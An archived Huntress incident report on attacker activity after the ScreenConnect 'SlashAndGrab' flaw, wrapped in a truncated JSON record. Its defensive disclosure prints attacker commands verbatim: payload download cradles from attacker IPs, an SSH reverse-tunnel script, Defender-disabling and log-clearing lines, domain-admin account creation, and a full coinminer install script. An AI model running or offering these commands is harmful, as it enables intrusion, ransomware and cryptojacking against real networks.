{
	"id": "acdc8103-ea12-4c82-a135-81d9cd123f5a",
	"created_at": "2026-04-06T00:10:37.287597Z",
	"updated_at": "2026-04-10T03:24:24.767151Z",
	"deleted_at": null,
	"sha1_hash": "5e909be8ce8fd4a266ff8ce956ee2db237761b95",
	"title": "SlashAndGrab | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9442908,
	"plain_text": "SlashAndGrab | Huntress\r\nArchived: 2026-04-05 20:26:45 UTC\r\nTable of Contents: \r\nAdversaries Deploying Ransomware\r\nAdversaries Enumerating\r\nAdversary Cryptocurrency Miners\r\nAdversaries Installing Additional Remote Access\r\nDownloading Tools and Payloads\r\nAdversaries Dropping Cobalt Strike\r\nAdversaries Persisting\r\nWrapping Up\r\nAppendix\r\nSince February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling\r\n“SlashAndGrab.” In previous posts, we shared the details of this vulnerability, its exploit, and shared detection guidance.\r\nIn this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC),\r\nwhere our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation\r\ntradecraft.\r\nThe adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and\r\nenjoy some tradecraft! \r\nAdversaries Deploying Ransomware \r\nA number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. \r\nLockBit\r\nWith the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how\r\n“LockBit” is still relevant. The LockBit deployments that we’ve seen are invoked with an encryptor that looks to be\r\ncompiled around September 13, 2022—which is the same timeline as the leaked LockBit 3.0 builder in the past. One\r\nobserved filename is classic LB3.exe, which again, matches the canned and publicly leaked builder.\r\nWe believe this is an important distinction. While the malware deployed appears associated with LockBit, there is no\r\nevidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to\r\ndisrupt one of the largest and most active ransomware groups in the world.\r\n#Ransomware binaries\r\nC:\\\\Windows\\\\TEMP\\\\ScreenConnect\\\\22.5.7881.8171\\\\LB3.exe\\\r\n#Defense evasion\r\npowershell -c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath\r\n$disk.deviceid}\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 1 of 19\n\nFigure 1: Example of LockBit ransomware executed through ScreenConnect\r\nWe’ve included the resulting ransom note associated with the above executable. \r\nFigure 2: Ransomware note \r\nOther Ransomware Attempts\r\nWe observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.\r\nWe also observed adversaries leverage certutil downloaded ransomware .MSI payloads, which they also made persistent via\r\nstartup folders.\r\ncertutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi\r\nFigure 3: Example of ransomware added as a persistence mechanism\r\nThe ransom note from the threat actor who deployed the MSI has been included as well. \r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 2 of 19\n\nFigure 4: Example ransomware note\r\nRansomware Anti-Forensics\r\nRansomware actors also tried to remove event logs via wevtutil.exe cl to frustrate investigators' analysis at a later time.\r\nFortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 😉 \r\nFigure 5: Example execution of wevtutil.exe log clearing via ScreenConnect\r\nAdversaries Enumerating\r\nThere was a particular adversary, using 185.62.58[.]132, executing a script on compromised systems across multiple unique\r\nvictim networks. The intent of the script was to identify which of their compromised systems with the highest privileges.\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 3 of 19\n\nWe believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to\r\nautomate their understanding of where to take additional, post-compromise actions moving forward. \r\npowershell.exe Invoke-WebRequest -Uri http[:]//108.61.210.72/MyUserName_$env:UserName\r\nFigure 6: Adversary enumerating the user they control via ScreenConnect \r\nFigure 7:  Adversary enumerating the user they control via ScreenConnect \r\nAdversary Cryptocurrency Miners\r\nSomewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to\r\ndeploy cryptocurrency coin miners.\r\nThere was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. \r\npowershell wget -uri http://185[.]232[.]92[.]32:8888/SentinelUI.exe -OutFile\r\nC:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe;\r\nwget -uri http://185[.]232[.]92[.]32:8888/Logs.txt -OutFile C:\\\\Windows\\\\Help\\\\Help\\\\Logs.txt;\r\nwget -uri http://185[.]232[.]92[.]32:8888/SentinelAgentCore.dll -OutFile\r\nC:\\\\Windows\\\\Help\\\\Help\\\\SentinelAgentCore.dll;\r\ncmd /c C:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe;\r\nSCHTASKS /Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_1708535250863 /TR\r\n\\\"C:\\\\Windows\\\\Help\\\\Help\\\\SentinelUI.exe\\\" /RU SYSTEM /SC ONSTART /RL HIGHEST /NP /F /DELAY\r\n0000:05\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 4 of 19\n\nFigure 8: Creation of a coinminer masquerading as SentinelOne\r\nWe also observed adversaries downloading and using a xmrig cryptominer, with further details below. \r\nAdversaries Installing Additional Remote Access\r\nAdversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain\r\npersistent even once the ScreenConnect fiasco has been cleared up. \r\nSimple Help\r\nAn adversary we observed installed the Simple Help RMM, from their ScreenConnect initial access.\r\nWe observed the Simple Help RMM agent deployed in the following directories:\r\nC:\\\\Users\\\\oldadmin\\\\Documents\\\\Maxx Uptime remote connection\\\\Files\\\\agent.exe\\\r\nC:\\\\ProgramData\\\\JWrapper-Remote Access\\\\JWAppsSharedConfig\\\\restricted\\\\SimpleService.exe\r\nC:\\\\Users\\\\oldadmin\\\\Documents\\\\MilsoftConnect\\\\Files\\\\ta.exe\r\nC:\\Windows\\spsrv.exe\r\nWe also observed a configuration file dropped to C:\\\\ProgramData\\\\JWrapper-Remote\r\nAccess\\\\JWAppsSharedConfig\\\\serviceconfig.xml, which revealed it was configured to communicate to the public IPv4\r\n91.92.240[.]71.\r\nThe user oldadmin was observed being used running similar commands across multiple unique victim organizations.\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 5 of 19\n\nFigure 9: Execution of Simple Help RMM Agent\r\nSSH\r\nThis threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an\r\nRDP connection. \r\n#Script that initiated SSH\r\n$r = \"C:\\ssh\\\"\r\n$e = $r + \"ssh.exe\"\r\n$g = \"aqua.oops.wtf\"\r\nIf (!(Test-Path $e)) {\r\nmd $r \u003e $null\r\niwr -Uri ($g + \"/z\") -o ($r + \"z.zip\")\r\nExpand-Archive ($r + \"z.zip\") -d $r\r\n}\r\n$args = @(\"tunnel@\" + $g,\"-Z lollersk8\",\"-R \" + $p + \":localhost:3389\",\"-p 443\", \"-N\",\"-\r\noStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null\")\r\n(Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id\r\n```\r\n#final command run on a host\r\nC:\\ssh\\ssh.exe\" tunnel@aqua[.]oops.wtf -Z lollersk8 -R 9595:localhost:3389 -p 443 -N -\r\noStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null\r\nFigure 10: Huntress report for the aforementioned ssh backdoor\r\nGoogle Chrome Remote Desktop\r\nWe also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the\r\ninstaller directly from Google infrastructure, which stores it as a service—no doubt in the hopes they could persistently and\r\nremotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).  \r\n# Download from Google\r\npowershell -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\\\1.msi')\r\n# Install\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 6 of 19\n\nmsiexec /i C:\\\\ProgramData\\\\1.msi\r\nFigure 11: Attempted download of Google Chrome’s Remote Desktop client\r\nFigure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client\r\nDownloading Tools and Payloads\r\nA common tradecraft denominator between the adversaries we observed involved them downloading further tools and\r\npayloads.\r\nFor example, an adversary leveraged PowerShell’s Invoke-WebRequest (iwr) to call on additional payloads for their SSH\r\npersistent tunnel.\r\npowershell.exe -c \"$p = 9595; iwr -UseBasicParsing aqua[.]oops[.]wtf/d | iex\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 7 of 19\n\nFigure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for\r\nSSH tunneling\r\nWe also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt\r\nto evade detection (spoiler: they did not evade detection). \r\ncurl https[:]//cmctt.]com/pub/media/wysiwyg/sun.png\r\ncurl https[:]//cmctt[.]com/pub/media/wysiwyg/invoke.png\r\nFigure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download\r\nThere was also this straightforward PowerShell downloading activity. However, the file was deleted, and their infrastructure\r\nwas offline, meaning the file’s intent had not been determined. \r\npowershell.exe -command \"\u0026 Invoke-RestMethod -Uri \\\"http[:]//91.92.241.199:8080/servicetest2.dll\\\" -OutFile\r\nservicehost.dll\r\nDownload Evasion\r\nWe also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under\r\nthe radar.\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 8 of 19\n\ncertutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi\r\nSome adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example,\r\nsvchost.exe was deleted before analysis could be conducted. \r\n#adversary excluded directories and neutralised Defender\r\npowershell -ep bypass -c \\\"Set-MpPreference -DisableRealtimeMonitoring $true;\r\nSet-MpPreference -ExclusionPath C:\\\\Windows\\\\Temp;\r\n#then downloaded their file\r\nInvoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\\\Windows\\\\Temp\\\\svchost.exe;\r\nC:\\\\Windows\\\\Temp\\\\svchost.exe\r\nFigure 15: Evidence of a malicious payload download with defense evasion attempt\r\nAdversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external\r\ninfrastructure. Specifically, this threat actor saved their beacon as a .PDF on a web server, renaming it to a .DAT on the\r\ntargeted machine.\r\ncurl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\\\programdata\\\\update[.]dat\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 9 of 19\n\nFigure 16: Evidence of Cobalt Strike payload download\r\nTransfer.sh\r\nInterestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website\r\ntransfer.sh.\r\npowershell -command \\\"iex ((New-Object\r\nSystem[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\\\"\r\nExcerpt of the script (full script in the Appendix): \r\n$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',\r\n\\'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',\r\n\\'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',\r\n\\'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',\r\n\\'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',\r\n\\'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',\r\n\\'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',\r\n\\'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',\r\n\\'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',\r\n\\'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',\r\n\\'hxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json',\r\n\\'hxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json',\r\n\\'hxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json',\r\n\\'hxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json',\r\n\\'hxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json'\r\n$randconf = Get-Random -InputObject $listi\r\nInvoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config[.]json'\r\nInvoke-WebRequest -Uri 'hxxps[://]transfer[.]sh/ePlTBkDtz2/rundll32[.]exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig[.]exe'\r\nInvoke-WebRequest -Uri 'hxxps[://]transfer[.]sh/CrNx3LVEgY/nssm[.]exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm[.]exe'\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 10 of 19\n\nFigure 17: PowerShell invocation of malicious script downloaded from Transfer.sh\r\nAdversaries Dropping Cobalt Strike\r\nUnsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. \r\n# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf\r\n#Exclude directory in Defender\r\npowershell.exe Add-MpPreference -ExclusionPath C:\\\\programdata -Force\r\n#Deploy beacon\r\nrundll32.exe c:\\\\programdata\\\\update.dat UpdateSystem\r\nFigure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 11 of 19\n\nFigure 19: Execution of Cobalt Strike\r\nIt’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.\r\nFigure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the\r\nScreenConnect session\r\nIt was also common to see the same adversaries drop the (earlier mentioned SentinelUI) cryptocurrency miner and attempt a\r\nCobalt Strike beacon, which Windows Defender would neutralize. \r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 12 of 19\n\nFigure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender\r\nAdversaries Persisting\r\nAdversaries, of course, want to persist in an environment, beyond their initial access method—and for good reason. This\r\nScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the\r\nadversary’s access. \r\nCreating New Users\r\nOur SOC observed a number of adversaries prioritize creating their own users, once they landed on a machine, using naming\r\nconventions that would attempt to fly under the radar, as well as add these to highly privileged groups.\r\nnet user /add default test@2021! /domain\r\nnet group \\\"Domain Admins\\\" default /add /domain\r\nnet group \\\"Enterprise Admins\\\" default /add /domain\r\nnet group \\\"Remote Desktop Users\\\" default /add /domain\r\nnet group \\\"Group Policy Creator Owners\\\" default /add /domain\r\nnet group \\\"Schema Admins\\\" default /add /domain\r\nnet user default /active:yes /domain\r\nnet user /add default1 test@2021! /domain\r\nnet user /add default1 test@2021! /domain\r\nnet user /add oldadmin Pass8080!!\r\nnet localgroup administrators oldadmin /add\r\nnet user temp 123123qwE /add /domain\r\nnet group \\\"Domain Admins\\\" temp /add /domain\r\nFigure 22: Evidence of adding a new user\r\nPersistent Reverse Shell\r\nThe SOC also observed an adversary transfer a C:\\\\perflogs\\\\RunSchedulerTaskOnce.ps1 from the ScreenConnect\r\ncompromised, as confirmed from analysis of Windows Event Log’s Application.evtx - Event ID 0.\r\n# Excerpt from Application.evtx EventID 0\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 13 of 19\n\nEventData:\r\nData:\r\n- \"Transferred files with action 'Transfer':\\r\\nRunSchedulerTask.ps1\\r\\nRunSchedulerTaskOnce.ps1\\r\\n\\r\\nVersion:\r\n22.10.11109.8417\\r\\nExecutable Path: C:\\\\Program Files (x86)\\\\ScreenConnect Client\r\n(9dd8b1107d6a42d9)\\\\ScreenConnect.ClientService.exe\\r\\n\"\r\nChannel: Application\r\nEventID: 0\r\nEventID_attributes:\r\nSystemTime: \"2024-02-23T04:06:06Z\"\r\nFigure 23: PowerShell execution of malicious script PowerShell script that included an encoded a Driver.dll\r\nThe script was in fact deleted, but could be partially restored by taking the PowerShell Operational EVTX and running this\r\nscript, which re-stitched the script back together from its ScriptBlockId (excerpt of script below).\r\nFigure 24: Extract of  PowerShell code from PowerShell Operational EVTX\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 14 of 19\n\nFigure 25: Extract of deobfuscated PowerShell code from CyberChef\r\nThis would download a driver.dll, and leverage WMI Event Consumer / PwSH persistence (named System__Cmr).\r\nFigure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform\r\nWrapping Up\r\nThis incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a\r\nshame our adversaries didn’t commit to pairing this new exploit with new tradecraft.\r\nIt’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t\r\nnovel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural\r\ntradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.\r\nAdversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat\r\nactors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help\r\nmonitoring for activity related to this vulnerability, you can use Huntress' free trial.\r\nIf you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even\r\nmore technical details behind this threat and answer any questions from the community.\r\nAppendix\r\nATT\u0026CK\r\nTactic Technique Description\r\nInitial Access\r\nT1190: Exploit Public-Facing\r\nApplication\r\nAdversaries are leveraging a path traversal bug and auth\r\nbypass in ScreenConnect that allows them to create a\r\nprivileged account for remote control.\r\nDiscovery T1087: Account Discovery\r\nAdversaries are attempting to discover privileged users by\r\nrunning a script across compromised systems.\r\nDefense\r\nEvasion\r\nT1562.001: Disable or Modify Tools\r\nAdversaries are attempting to evade detection by adding\r\nexclusion paths to Windows Defender using PowerShell.\r\nDefense\r\nEvasion\r\nT1070.001: Clear Windows Event\r\nLogs\r\nRansomware actors attempt to remove event logs using\r\nwevtutil.exe cl command to hinder forensic analysis.\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 15 of 19\n\nTactic Technique Description\r\nExecution\r\nT1059: Command and Scripting\r\nInterpreter\r\nT1059.001: Powershell\r\nT1059.003: Windows Command Shell\r\nAdversaries are using PowerShell and CMD to download\r\nand execute scripts from remote locations, facilitating\r\nvarious activities such as cryptocurrency mining and remote\r\naccess.\r\nPersistence\r\nT1547.001: Boot or Logon Autostart\r\nExecution: Registry Run Keys /\r\nStartup Folder\r\nAdversaries stored their MSI ransomware payload in the\r\nPublic startup folder\r\nPersistence T1136: Create Account\r\nAdversaries created new users and in some instances added\r\nthem to privileged groups.\r\nPersistence T1053: Scheduled Task\r\nAdversaries are creating scheduled tasks for their\r\ncryptominers and remote access\r\nPersistence\r\nT1546.003: Event Triggered\r\nExecution: Windows Management\r\nInstrumentation Event Subscription\r\nAdversaries are modifying the registry to achieve\r\npersistence by adding WMI Event Consumers.\r\nPersistence T1133: External Remote Services\r\nAdversaries are compromising ScreenConnect instances,\r\ndeploying SSH tunnels, Chrome remote desktops, and\r\nalternate RMMs for evasive, persistent remote access\r\nCommand\r\nand Control\r\nT1105: Ingress Tool Transfer\r\nAdversaries are downloading files using curl, certutil, and\r\nInvoke-WebRequest.\r\nCommand\r\nand Control\r\nT1572: Protocol Tunneling Adversaries created SSH tunnels for communication.\r\nImpact T1496: Resource Hijacking Cryptocurrency miners are being deployed by adversaries\r\nImpact T1486: Data Encrypted for Impact\r\nAdversaries deployed ransomware via compromised\r\nScreenConnect\r\nSoftware S0154: Cobalt Strike\r\nAdversaries are leveraging Cobalt Strike beacons to achieve\r\nC2 connections to compromised ScreenConnect machines.\r\nIoCs\r\nIoC Type Indicator Hash\r\nRansomware C:\\Windows\\TEMP\\ScreenConnect\\22.5.7881.8171\\LB3.exe 78a11835b48bbe6a0127b777c0c3cc102e726205f67afefc\r\nRansomware http[:]//23.26.137[.]225:8084/msappdata.msi c:\\mpyutd.msi 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc8\r\nRansomware UPX.exe 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b\r\nRansomware svchost.exe a50d9954c0a50e5804065a8165b1857104816020024976\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/GElU1LmvbS/injcet.ps1 ec49f5033374eb8f533e291111e1433e2da127f45857aebb\r\nCobalt Strike hxxp[://]minish[.]wiki[.]gd/c[.]pdfC:\\programdata\\update[.]dat 0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6\r\nCobalt Strike C:\\perflogs\\RunSchedulerTaskOnce.ps1 6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20\r\nCobalt Strike copy.exe 81b4a649a42a157facede979828095ccddcdf6cec47e8a31\r\nGoogle\r\nChrome\r\nRemote\r\nDesktop\r\nhttps://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msiC:\\ProgramData\\1.msi\r\nc47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f23\r\nSimpleHelp\r\nRMM\r\nhttps[:]//cmctt.]com/pub/media/wysiwyg/sun.pngC:\\Windows\\spsrv.exe e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2\r\nSimpleHelp\r\nRMM\r\ncmctt[.]com/pub/media/wysiwyg/invoke.png 37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab9\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 16 of 19\n\nIoC Type Indicator Hash\r\nSimpleHelp\r\nRMM\r\nC:\\Users\\oldadmin\\Documents\\Maxx Uptime remote\r\nconnection\\Files\\agent.exe\r\na0fd0ceb95e775a48a95c00eab42fa5bb170f552005c3881\r\nSimpleHelp\r\nRMM\r\nC:\\ProgramData\\JWrapper-Remote\r\nAccess\\JWAppsSharedConfig\\serviceconfig.xml\r\n2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b\r\nSimpleHelp\r\nRMM IPv4\r\n91.92.240[.]71\r\nSSH Script d 69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a\r\nSSH Script Z.zip aa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed\r\nBeacon driver.dll 6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e7\r\nUnknown 159[.]65[.]130[.]146:4444/svchost.exeC:\\Windows\\Temp\\svchost.exe\r\nCryptocurrency\r\nMiner\r\nhttp://185[.]232[.]92[.]32:8888/SentinelUI.exe\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json\r\nCryptocurrency\r\nMiner\r\nhxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json\r\nContents of inject.ps1 - Crypto Currency Miner\r\npowershell -command \\\"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\\\"\r\n# Check for Administrator rights\r\nif (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInR\r\nWrite-Host 'Please Run as Administrator!' -ForegroundColor Red\r\nExit\r\n}\r\n# Check and return current user name\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 17 of 19\n\n$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\\')[1]\r\n# Paths\r\n$dircheck = 'C:\\ProgramData\\.logstxt'\r\n#$filcheck = 'C:\\path\\to\\xmrig.service' # You might need to adjust this, Windows doesn't have an equivalent to systemd\r\n$filcheck = 'C:\\Users\\$currentUserName\\rundll32.exe'\r\n# Removal functions\r\nif (Test-Path $dircheck) {\r\nRemove-Item -Recurse -Force $dircheck\r\n}\r\nif (Test-Path $filcheck) {\r\nRemove-Item -Force $filcheck\r\n}\r\n# Download files, I am using ngrok as port forwarding for my containers to FTP server\r\n$listi =\r\n'https://transfer.sh/UFQTwgYszH/config14.json','https://transfer.sh/ATVMNG5Pbu/config13.json','https://transfer.sh/s27p8BcTxi/config12.json','http\r\n$randconf = Get-Random -InputObject $listi\r\nInvoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config.json'\r\nInvoke-WebRequest -Uri 'https://transfer.sh/ePlTBkDtz2/rundll32.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig.exe'\r\nInvoke-WebRequest -Uri 'https://transfer.sh/CrNx3LVEgY/nssm.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm.exe'\r\n# Create xmrig service file (assuming this has an equivalent in Windows)\r\n# TODO: Check if you need an actual service wrapper like NSSM\r\n# Get thread count (using CPU count as a basic substitute for now)\r\n$threads = (Get-WmiObject -Class Win32_ComputerSystem).NumberOfLogicalProcessors\r\n$tf = [math]::Round(25 * $threads)\r\n# Move and setup files\r\nif (-not (Test-Path $dircheck)) {\r\nNew-Item -ItemType Directory -Path $dircheck\r\n}\r\nMove-Item rundll32.exe $dircheck\r\nMove-Item config.json $dircheck\r\nMove-Item nssm.exe $dircheck\r\n# Move-Item xmrig.service C:\\path\\to\\services\\folder # Adjust path and use only if required\r\n# TODO: Setup as a Windows service (consider tools like NSSM or `sc` command)\r\n#create a nssm command that will make the xmrig.exe run as a service in the background\r\nSet-Location $dircheck\r\n.\\nssm install xmrig 'C:\\ProgramData\\.logstxt\\rundll32.exe'\r\n.\\nssm set xmrig AppDirectory 'C:\\ProgramData\\.logstxt'\r\n.\\nssm set xmrig AppParameters 'rundll32.exe -B -c config.json' # -B = run the miner in the background\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 18 of 19\n\n# Start the service\r\n.\\nssm start xmrig\r\n#make the xmrig service run on startup\r\n.\\nssm set xmrig start SERVICE_AUTO_START\r\n#make the xmrig write in a log file\r\n.\\nssm set xmrig AppNoConsole 1\r\n#make the xmrig run in the background\r\n.\\nssm set xmrig Type SERVICE_WIN32_OWN_PROCESS\r\n# TODO: Windows doesn't have an equivalent to sysctl or hugepages in the same sense as Linux\r\n# Clean up\r\nRemove-Item $PSCommandPath -Force\r\nAcknowledgments\r\nThank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities\r\nincluded in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha,\r\nFaith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap\r\nOzdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.\r\nSpecial thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.\r\nSource: https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nhttps://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
	],
	"report_names": [
		"slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
	],
	"threat_actors": [
		{
